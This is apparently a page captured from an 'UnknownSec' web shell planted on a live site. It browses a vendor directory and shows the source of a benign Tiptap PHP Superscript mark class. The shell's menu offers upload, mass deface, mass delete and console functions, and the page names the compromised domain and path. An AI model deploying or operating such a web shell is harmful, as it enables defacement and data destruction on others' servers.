shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolasweb.brannanatkinson.com
/
vendor
/
ueberdosis
/
tiptap-php
/
src
/
Marks
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
Superscript.php
<?php namespace Tiptap\Marks; use Tiptap\Core\Mark; use Tiptap\Utils\HTML; class Superscript extends Mark { public static $name = 'superscript'; public function addOptions() { return [ 'HTMLAttributes' => [], ]; } public function parseHTML() { return [ [ 'tag' => 'sup', ], [ 'style' => 'vertical-align=super', ], ]; } public function renderHTML($mark, $HTMLAttributes = []) { return ['sup', HTML::mergeAttributes($this->options['HTMLAttributes'], $HTMLAttributes), 0]; } }
© 2026 UnknownSec